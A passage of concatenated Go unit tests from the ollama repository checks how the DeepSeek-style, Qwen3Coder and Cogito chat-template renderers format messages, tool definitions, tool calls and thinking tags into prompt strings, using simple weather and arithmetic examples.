[]api.Message{}, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>`, }, { name: "only system messages", messages: []api.Message{ {Role: "system", Content: "System instruction"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: 
`<|begin▁of▁sentence|>System instruction`, }, { name: "multiple think tags in content", messages: []api.Message{ {Role: "user", Content: "Complex question"}, {Role: "assistant", Content: "First thought</think>Second thought</think>Final answer"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>Complex question<|Assistant|></think>Second thought</think>Final answer<|end▁of▁sentence|>`, }, { name: "thinking enabled after tool call - should render thinking", messages: []api.Message{ {Role: "user", Content: "What's the weather in Paris?"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, {Role: "tool", Content: "Temperature: 22°C, Sunny"}, {Role: "assistant", Content: "Based on the weather data, it's sunny in Paris."}, {Role: "user", Content: "Now tell me about London weather too."}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|><|User|>What's the weather in Paris?<|Assistant|></think><|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Paris"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|tool▁output▁begin|>Temperature: 22°C, Sunny<|tool▁output▁end|>Based on the weather data, it's sunny in Paris.<|end▁of▁sentence|><|User|>Now tell me about London weather too.<|Assistant|><think>`, }, { name: "thinking disabled after tool call - should not render thinking", messages: []api.Message{ {Role: "user", Content: "What's the weather in Paris?"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, {Role: "tool", Content: "Temperature: 22°C, Sunny"}, {Role: "assistant", Content: "Based on the weather data, it's sunny in Paris."}, {Role: "user", Content: "Now tell me about London weather too."}, }, thinkValue: &api.ThinkValue{Value: 
false}, expected: `<|begin▁of▁sentence|><|User|>What's the weather in Paris?<|Assistant|></think><|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Paris"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|tool▁output▁begin|>Temperature: 22°C, Sunny<|tool▁output▁end|>Based on the weather data, it's sunny in Paris.<|end▁of▁sentence|><|User|>Now tell me about London weather too.<|Assistant|></think>`, }, { name: "thinking enabled but messages without thinking content", messages: []api.Message{ {Role: "user", Content: "First question about cats"}, {Role: "assistant", Content: "Cats are wonderful pets."}, {Role: "user", Content: "What about dogs?"}, {Role: "assistant", Content: "Dogs are loyal companions."}, {Role: "user", Content: "Final question about birds"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|><|User|>First question about cats<|Assistant|></think>Cats are wonderful pets.<|end▁of▁sentence|><|User|>What about dogs?<|Assistant|></think>Dogs are loyal companions.<|end▁of▁sentence|><|User|>Final question about birds<|Assistant|><think>`, }, { name: "thinking disabled for all assistant responses", messages: []api.Message{ {Role: "user", Content: "First question about cats"}, {Role: "assistant", Content: "Cats are wonderful pets."}, {Role: "user", Content: "What about dogs?"}, {Role: "assistant", Content: "Dogs are loyal companions."}, {Role: "user", Content: "Final question about birds"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>First question about cats<|Assistant|></think>Cats are wonderful pets.<|end▁of▁sentence|><|User|>What about dogs?<|Assistant|></think>Dogs are loyal companions.<|end▁of▁sentence|><|User|>Final question about birds<|Assistant|></think>`, }, { name: "complex conversation with tool calls and thinking enabled", messages: []api.Message{ {Role: "user", Content: "Tell me about the weather"}, {Role: "assistant", Content: "I'll check the 
weather for you."}, {Role: "user", Content: "Actually, get Paris weather specifically"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, {Role: "tool", Content: "Paris: 22°C, Sunny"}, {Role: "assistant", Content: "The weather in Paris is great!"}, {Role: "user", Content: "What about the forecast for tomorrow?"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|><|User|>Tell me about the weather<|Assistant|></think>I'll check the weather for you.<|end▁of▁sentence|><|User|>Actually, get Paris weather specifically<|Assistant|></think><|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Paris"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|tool▁output▁begin|>Paris: 22°C, Sunny<|tool▁output▁end|>The weather in Paris is great!<|end▁of▁sentence|><|User|>What about the forecast for tomorrow?<|Assistant|><think>`, }, { name: "tool call without subsequent user message - no thinking", messages: []api.Message{ {Role: "user", Content: "Get the weather"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, {Role: "tool", Content: "22°C, Sunny"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|><|User|>Get the weather<|Assistant|></think><|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Paris"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|tool▁output▁begin|>22°C, Sunny<|tool▁output▁end|>`, }, { name: "messages with thinking content, no thinking in render", messages: []api.Message{ {Role: "user", Content: "Solve this math problem: 15 * 23"}, { Role: "assistant", Content: "The answer is 345.", Thinking: "Let me calculate 15 * 23. 
I can break this down: 15 * 20 = 300, and 15 * 3 = 45, so 300 + 45 = 345.", }, {Role: "user", Content: "What about 12 * 34?"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|><|User|>Solve this math problem: 15 * 23<|Assistant|></think>The answer is 345.<|end▁of▁sentence|><|User|>What about 12 * 34?<|Assistant|></think>`, }, { name: "conversation with mix of thinking and no thinking", messages: []api.Message{ {Role: "user", Content: "Explain quantum physics"}, { Role: "assistant", Content: "Quantum physics is the study of matter and energy at the smallest scales.", Thinking: "This is a complex topic. I should start with basic concepts and avoid overwhelming technical details.", }, {Role: "user", Content: "What about photons?"}, { Role: "assistant", Content: "Photons are particles of light with no mass.", }, {Role: "user", Content: "How do they interact with matter?"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|><|User|>Explain quantum physics<|Assistant|></think>Quantum physics is the study of matter and energy at the smallest scales.<|end▁of▁sentence|><|User|>What about photons?<|Assistant|></think>Photons are particles of light with no mass.<|end▁of▁sentence|><|User|>How do they interact with matter?<|Assistant|><think>`, }, { name: "tool call with thinking content in response", messages: []api.Message{ {Role: "user", Content: "What's the weather in Tokyo and New York?"}, { Role: "assistant", Content: "I'll check the weather for both cities.", Thinking: "I need to call the weather API for two different cities. 
Let me make parallel calls.", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Tokyo", }), }, }, { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "New York", }), }, }, }, }, {Role: "tool", Content: "Tokyo: 18°C, Cloudy"}, {Role: "tool", Content: "New York: 22°C, Sunny"}, { Role: "assistant", Content: "Based on the weather data: Tokyo is cloudy at 18°C, while New York is sunny at 22°C.", Thinking: "The data shows a nice contrast between the two cities. Tokyo is cooler and overcast while NYC has better weather.", }, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|><|User|>What's the weather in Tokyo and New York?<|Assistant|></think>I'll check the weather for both cities.<|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Tokyo"}<|tool▁call▁end|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"New York"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|tool▁output▁begin|>Tokyo: 18°C, Cloudy<|tool▁output▁end|><|tool▁output▁begin|>New York: 22°C, Sunny<|tool▁output▁end|>Based on the weather data: Tokyo is cloudy at 18°C, while New York is sunny at 22°C.<|end▁of▁sentence|>`, }, { name: "empty thinking field", messages: []api.Message{ {Role: "user", Content: "Simple question"}, { Role: "assistant", Content: "Simple answer.", Thinking: "", // Empty thinking content }, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|><|User|>Simple question<|Assistant|></think>Simple answer.<|end▁of▁sentence|>`, }, { name: "with tools definitions", messages: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "What's the weather like?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get current weather information", Parameters: api.ToolFunctionParameters{ Type: 
"object", Properties: testPropsMap(map[string]api.ToolProperty{ "location": { Type: api.PropertyType{"string"}, Description: "City name", }, }), Required: []string{"location"}, }, }, }, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are a helpful assistant. ## Tools You have access to the following tools: ### get_weather Description: Get current weather information Parameters: {"type":"object","required":["location"],"properties":{"location":{"type":"string","description":"City name"}}} IMPORTANT: ALWAYS adhere to this exact format for tool use: <|tool▁calls▁begin|><|tool▁call▁begin|>tool_call_name<|tool▁sep|>tool_call_arguments<|tool▁call▁end|>{{additional_tool_calls}}<|tool▁calls▁end|> Where: - ` + "`tool_call_name`" + ` must be an exact match to one of the available tools - ` + "`tool_call_arguments`" + ` must be valid JSON that strictly follows the tool's Parameters Schema - For multiple tool calls, chain them directly without separators or spaces <|User|>What's the weather like?<|Assistant|></think>`, }, { name: "tools definitions with thinking enabled", messages: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "What's the weather in Paris?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get current weather information", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "location": { Type: api.PropertyType{"string"}, Description: "City name", }, }), Required: []string{"location"}, }, }, }, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|>You are a helpful assistant. 
## Tools You have access to the following tools: ### get_weather Description: Get current weather information Parameters: {"type":"object","required":["location"],"properties":{"location":{"type":"string","description":"City name"}}} IMPORTANT: ALWAYS adhere to this exact format for tool use: <|tool▁calls▁begin|><|tool▁call▁begin|>tool_call_name<|tool▁sep|>tool_call_arguments<|tool▁call▁end|>{{additional_tool_calls}}<|tool▁calls▁end|> Where: - ` + "`tool_call_name`" + ` must be an exact match to one of the available tools - ` + "`tool_call_arguments`" + ` must be valid JSON that strictly follows the tool's Parameters Schema - For multiple tool calls, chain them directly without separators or spaces <|User|>What's the weather in Paris?<|Assistant|><think>`, }, { name: "tools definitions with actual tool call", messages: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "What's the weather in Paris?"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get current weather information", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "location": { Type: api.PropertyType{"string"}, Description: "City name", }, }), Required: []string{"location"}, }, }, }, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are a helpful assistant. 
## Tools You have access to the following tools: ### get_weather Description: Get current weather information Parameters: {"type":"object","required":["location"],"properties":{"location":{"type":"string","description":"City name"}}} IMPORTANT: ALWAYS adhere to this exact format for tool use: <|tool▁calls▁begin|><|tool▁call▁begin|>tool_call_name<|tool▁sep|>tool_call_arguments<|tool▁call▁end|>{{additional_tool_calls}}<|tool▁calls▁end|> Where: - ` + "`tool_call_name`" + ` must be an exact match to one of the available tools - ` + "`tool_call_arguments`" + ` must be valid JSON that strictly follows the tool's Parameters Schema - For multiple tool calls, chain them directly without separators or spaces <|User|>What's the weather in Paris?<|Assistant|></think><|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Paris"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|>`, }, { name: "tools definitions with full conversation cycle", messages: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "What's the weather in Paris?"}, { Role: "assistant", Content: "I'll check the weather for you.", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, {Role: "tool", Content: "Temperature: 22°C, Sunny"}, {Role: "assistant", Content: "The weather in Paris is 22°C and sunny!"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get current weather information", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "location": { Type: api.PropertyType{"string"}, Description: "City name", }, }), Required: []string{"location"}, }, }, }, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are a helpful assistant. 
## Tools You have access to the following tools: ### get_weather Description: Get current weather information Parameters: {"type":"object","required":["location"],"properties":{"location":{"type":"string","description":"City name"}}} IMPORTANT: ALWAYS adhere to this exact format for tool use: <|tool▁calls▁begin|><|tool▁call▁begin|>tool_call_name<|tool▁sep|>tool_call_arguments<|tool▁call▁end|>{{additional_tool_calls}}<|tool▁calls▁end|> Where: - ` + "`tool_call_name`" + ` must be an exact match to one of the available tools - ` + "`tool_call_arguments`" + ` must be valid JSON that strictly follows the tool's Parameters Schema - For multiple tool calls, chain them directly without separators or spaces <|User|>What's the weather in Paris?<|Assistant|></think>I'll check the weather for you.<|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Paris"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|tool▁output▁begin|>Temperature: 22°C, Sunny<|tool▁output▁end|>The weather in Paris is 22°C and sunny!<|end▁of▁sentence|>`, }, { name: "tools with thinking and full conversation", messages: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Check the weather in Tokyo"}, { Role: "assistant", Thinking: "The user wants weather info for Tokyo. I should use the get_weather tool.", Content: "Let me check that for you.", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Tokyo", }), }, }, }, }, {Role: "tool", Content: "Temperature: 18°C, Cloudy"}, { Role: "assistant", Thinking: "The weather data shows it's cloudy and cool. 
I should present this clearly.", Content: "In Tokyo, it's currently 18°C and cloudy.", }, {Role: "user", Content: "What about London?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get current weather information", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "location": { Type: api.PropertyType{"string"}, Description: "City name", }, }), Required: []string{"location"}, }, }, }, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|>You are a helpful assistant. ## Tools You have access to the following tools: ### get_weather Description: Get current weather information Parameters: {"type":"object","required":["location"],"properties":{"location":{"type":"string","description":"City name"}}} IMPORTANT: ALWAYS adhere to this exact format for tool use: <|tool▁calls▁begin|><|tool▁call▁begin|>tool_call_name<|tool▁sep|>tool_call_arguments<|tool▁call▁end|>{{additional_tool_calls}}<|tool▁calls▁end|> Where: - ` + "`tool_call_name`" + ` must be an exact match to one of the available tools - ` + "`tool_call_arguments`" + ` must be valid JSON that strictly follows the tool's Parameters Schema - For multiple tool calls, chain them directly without separators or spaces <|User|>Check the weather in Tokyo<|Assistant|></think>Let me check that for you.<|tool▁calls▁begin|><|tool▁call▁begin|>get_weather<|tool▁sep|>{"location":"Tokyo"}<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|tool▁output▁begin|>Temperature: 18°C, Cloudy<|tool▁output▁end|>In Tokyo, it's currently 18°C and cloudy.<|end▁of▁sentence|><|User|>What about London?<|Assistant|><think>`, }, { name: "multiple tools definitions", messages: []api.Message{ {Role: "system", Content: "You are a helpful assistant with access to multiple tools."}, {Role: "user", Content: "What can you help me with?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: 
"get_weather", Description: "Get current weather information", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "location": { Type: api.PropertyType{"string"}, Description: "City name", }, }), Required: []string{"location"}, }, }, }, { Type: "function", Function: api.ToolFunction{ Name: "calculate", Description: "Perform mathematical calculations", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "expression": { Type: api.PropertyType{"string"}, Description: "Mathematical expression to evaluate", }, }), Required: []string{"expression"}, }, }, }, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are a helpful assistant with access to multiple tools. ## Tools You have access to the following tools: ### get_weather Description: Get current weather information Parameters: {"type":"object","required":["location"],"properties":{"location":{"type":"string","description":"City name"}}} ### calculate
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
true
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/qwen3coder_test.go
model/renderers/qwen3coder_test.go
package renderers import ( "testing" "github.com/google/go-cmp/cmp" "github.com/ollama/ollama/api" ) func TestQwen3CoderRenderer(t *testing.T) { tests := []struct { name string msgs []api.Message tools []api.Tool expected string }{ { name: "basic", msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello, how are you?"}, }, expected: `<|im_start|>system You are a helpful assistant.<|im_end|> <|im_start|>user Hello, how are you?<|im_end|> <|im_start|>assistant `, }, { name: "with tools and response", msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant with access to tools."}, {Role: "user", Content: "What is the weather like in San Francisco?"}, { Role: "assistant", Content: "I'll check the weather in San Francisco for you.", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "unit": "fahrenheit", }), }, }, }, }, {Role: "tool", Content: "{\"location\": \"San Francisco, CA\", \"temperature\": 68, \"condition\": \"partly cloudy\", \"humidity\": 65, \"wind_speed\": 12}", ToolName: "get_weather"}, {Role: "user", Content: "That sounds nice! What about New York?"}, }, tools: []api.Tool{ {Function: api.ToolFunction{ Name: "get_weather", Description: "Get the current weather in a given location", Parameters: api.ToolFunctionParameters{ Required: []string{"unit"}, Properties: testPropsMap(map[string]api.ToolProperty{ "unit": {Type: api.PropertyType{"string"}, Enum: []any{"celsius", "fahrenheit"}, Description: "The unit of temperature"}, // TODO(drifkin): add multiple params back once we have predictable // order via some sort of ordered map type (see // <https://github.com/ollama/ollama/issues/12244>) /* "location": {Type: api.PropertyType{"string"}, Description: "The city and state, e.g. San Francisco, CA"}, */ }), }, }}, }, expected: `<|im_start|>system You are a helpful assistant with access to tools. 
# Tools You have access to the following functions: <tools> <function> <name>get_weather</name> <description>Get the current weather in a given location</description> <parameters> <parameter> <name>unit</name> <type>string</type> <description>The unit of temperature</description> <enum>["celsius","fahrenheit"]</enum> </parameter> <required>["unit"]</required> </parameters> </function> </tools> If you choose to call a function ONLY reply in the following format with NO suffix: <tool_call> <function=example_function_name> <parameter=example_parameter_1> value_1 </parameter> <parameter=example_parameter_2> This is the value for the second parameter that can span multiple lines </parameter> </function> </tool_call> <IMPORTANT> Reminder: - Function calls MUST follow the specified format: an inner <function=...></function> block must be nested within <tool_call></tool_call> XML tags - Required parameters MUST be specified - You may provide optional reasoning for your function call in natural language BEFORE the function call, but NOT after - If there is no function call available, answer the question like normal with your current knowledge and do not tell the user about function calls </IMPORTANT><|im_end|> <|im_start|>user What is the weather like in San Francisco?<|im_end|> <|im_start|>assistant I'll check the weather in San Francisco for you. <tool_call> <function=get_weather> <parameter=unit> fahrenheit </parameter> </function> </tool_call><|im_end|> <|im_start|>user <tool_response> {"location": "San Francisco, CA", "temperature": 68, "condition": "partly cloudy", "humidity": 65, "wind_speed": 12} </tool_response> <|im_end|> <|im_start|>user That sounds nice! 
What about New York?<|im_end|> <|im_start|>assistant `, }, { name: "parallel tool calls", msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant with access to tools."}, {Role: "user", Content: "call double(1) and triple(2)"}, {Role: "assistant", Content: "I'll call double(1) and triple(2) for you.", ToolCalls: []api.ToolCall{ {Function: api.ToolCallFunction{Name: "double", Arguments: testArgs(map[string]any{"number": "1"})}}, {Function: api.ToolCallFunction{Name: "triple", Arguments: testArgs(map[string]any{"number": "2"})}}, }}, {Role: "tool", Content: "{\"number\": 2}", ToolName: "double"}, {Role: "tool", Content: "{\"number\": 6}", ToolName: "triple"}, }, tools: []api.Tool{ {Function: api.ToolFunction{Name: "double", Description: "Double a number", Parameters: api.ToolFunctionParameters{Properties: testPropsMap(map[string]api.ToolProperty{ "number": {Type: api.PropertyType{"string"}, Description: "The number to double"}, })}}}, {Function: api.ToolFunction{Name: "triple", Description: "Triple a number", Parameters: api.ToolFunctionParameters{Properties: testPropsMap(map[string]api.ToolProperty{ "number": {Type: api.PropertyType{"string"}, Description: "The number to triple"}, })}}}, }, expected: `<|im_start|>system You are a helpful assistant with access to tools. 
# Tools You have access to the following functions: <tools> <function> <name>double</name> <description>Double a number</description> <parameters> <parameter> <name>number</name> <type>string</type> <description>The number to double</description> </parameter> </parameters> </function> <function> <name>triple</name> <description>Triple a number</description> <parameters> <parameter> <name>number</name> <type>string</type> <description>The number to triple</description> </parameter> </parameters> </function> </tools> If you choose to call a function ONLY reply in the following format with NO suffix: <tool_call> <function=example_function_name> <parameter=example_parameter_1> value_1 </parameter> <parameter=example_parameter_2> This is the value for the second parameter that can span multiple lines </parameter> </function> </tool_call> <IMPORTANT> Reminder: - Function calls MUST follow the specified format: an inner <function=...></function> block must be nested within <tool_call></tool_call> XML tags - Required parameters MUST be specified - You may provide optional reasoning for your function call in natural language BEFORE the function call, but NOT after - If there is no function call available, answer the question like normal with your current knowledge and do not tell the user about function calls </IMPORTANT><|im_end|> <|im_start|>user call double(1) and triple(2)<|im_end|> <|im_start|>assistant I'll call double(1) and triple(2) for you. 
<tool_call> <function=double> <parameter=number> 1 </parameter> </function> </tool_call> <tool_call> <function=triple> <parameter=number> 2 </parameter> </function> </tool_call><|im_end|> <|im_start|>user <tool_response> {"number": 2} </tool_response> <tool_response> {"number": 6} </tool_response> <|im_end|> <|im_start|>assistant `, }, { name: "prefill", msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Tell me something interesting."}, {Role: "assistant", Content: "I'll tell you something interesting about cats"}, }, expected: `<|im_start|>system You are a helpful assistant.<|im_end|> <|im_start|>user Tell me something interesting.<|im_end|> <|im_start|>assistant I'll tell you something interesting about cats`, }, { name: "complex tool call arguments should remain json encoded", msgs: []api.Message{ {Role: "user", Content: "call tool"}, {Role: "assistant", ToolCalls: []api.ToolCall{ {Function: api.ToolCallFunction{ Name: "echo", Arguments: testArgs(map[string]any{ "payload": map[string]any{"foo": "bar"}, }), }}, }}, {Role: "tool", Content: "{\"payload\": {\"foo\": \"bar\"}}", ToolName: "echo"}, }, expected: `<|im_start|>user call tool<|im_end|> <|im_start|>assistant <tool_call> <function=echo> <parameter=payload> {"foo":"bar"} </parameter> </function> </tool_call><|im_end|> <|im_start|>user <tool_response> {"payload": {"foo": "bar"}} </tool_response> <|im_end|> <|im_start|>assistant `, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { rendered, err := (&Qwen3CoderRenderer{}).Render(tt.msgs, tt.tools, nil) if err != nil { t.Fatal(err) } if diff := cmp.Diff(rendered, tt.expected); diff != "" { t.Errorf("mismatch (-got +want):\n%s", diff) } }) } } func TestFormatToolCallArgument(t *testing.T) { tests := []struct { name string arg any expected string }{ { name: "string", arg: "foo", // notice no quotes around the string expected: "foo", }, { name: "map", arg: map[string]any{"foo": "bar"}, 
expected: "{\"foo\":\"bar\"}", }, { name: "number", arg: 1, expected: "1", }, { name: "boolean", arg: true, expected: "true", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { got := formatToolCallArgument(tt.arg) if got != tt.expected { t.Errorf("formatToolCallArgument(%v) = %v, want %v", tt.arg, got, tt.expected) } }) } } func TestQwen3ToolDefinitionTypes(t *testing.T) { tests := []struct { name string propertyType api.PropertyType expected string }{ { name: "simple", propertyType: api.PropertyType{"string"}, expected: "string", }, { name: "multiple", propertyType: api.PropertyType{"string", "number"}, expected: "[\"string\",\"number\"]", }, { name: "empty", propertyType: api.PropertyType{}, expected: "[]", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { got := formatToolDefinitionType(tt.propertyType) if got != tt.expected { t.Errorf("formatToolDefinitionType() = %v, want %v", got, tt.expected) } }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/cogito_test.go
model/renderers/cogito_test.go
package renderers import ( "testing" "github.com/google/go-cmp/cmp" "github.com/ollama/ollama/api" ) func TestCogitoRenderer(t *testing.T) { tests := []struct { name string messages []api.Message tools []api.Tool thinkValue *api.ThinkValue expected string }{ { name: "basic user message", messages: []api.Message{ {Role: "user", Content: "Hello, how are you?"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Hello, how are you?<|Assistant|>`, }, { name: "basic with system message", messages: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello, how are you?"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco. You are a helpful assistant.<|User|>Hello, how are you?<|Assistant|>`, }, { name: "conversation with assistant response", messages: []api.Message{ {Role: "user", Content: "What is the capital of France?"}, {Role: "assistant", Content: "The capital of France is Paris."}, {Role: "user", Content: "Fantastic!"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>What is the capital of France?<|Assistant|>The capital of France is Paris.<|end▁of▁sentence|><|User|>Fantastic!<|Assistant|>`, }, { name: "thinking enabled without system", messages: []api.Message{ {Role: "user", Content: "Hello, how are you?"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|>Enable deep thinking subroutine. 
You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Hello, how are you?<|Assistant|><think> `, }, { name: "thinking enabled with system", messages: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello, how are you?"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: `<|begin▁of▁sentence|>Enable deep thinking subroutine. You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco. You are a helpful assistant. <|User|>Hello, how are you?<|Assistant|><think> `, }, { name: "thinking disabled", messages: []api.Message{ {Role: "user", Content: "Hello, how are you?"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>Hello, how are you?<|Assistant|>`, }, { name: "with tools", messages: []api.Message{ {Role: "user", Content: "What's the weather like?"}, }, thinkValue: &api.ThinkValue{Value: false}, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get current weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "location": { Type: api.PropertyType{"string"}, Description: "City name", }, }), Required: []string{"location"}, }, }, }, }, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco. 
You have the following functions available: ` + "```json\n" + `{ "type": "function", "function": { "name": "get_weather", "description": "Get current weather", "parameters": { "type": "object", "required": [ "location" ], "properties": { "location": { "type": "string", "description": "City name" } } } } } ` + "```\n" + `<|User|>What's the weather like?<|Assistant|>`, }, { name: "assistant with tool calls", messages: []api.Message{ {Role: "user", Content: "What's the weather in Paris?"}, { Role: "assistant", Content: "I'll check the weather in Paris for you.", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research lab based in San Francisco.<|User|>What's the weather in Paris?<|Assistant|>I'll check the weather in Paris for you.<|tool▁calls▁begin|><|tool▁call▁begin|>function<|tool▁sep|>get_weather ` + "```json\n" + `{"location":"Paris"} ` + "```" + `<|tool▁call▁end|><|tool▁calls▁end|><|end▁of▁sentence|><|Assistant|>`, }, { name: "tool response", messages: []api.Message{ {Role: "user", Content: "What's the weather in Paris?"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{ "location": "Paris", }), }, }, }, }, {Role: "tool", Content: "Temperature: 22°C, Sunny"}, }, thinkValue: &api.ThinkValue{Value: false}, expected: `<|begin▁of▁sentence|>You are Cogito, an AI assistant created by Deep Cogito, which is an AI research 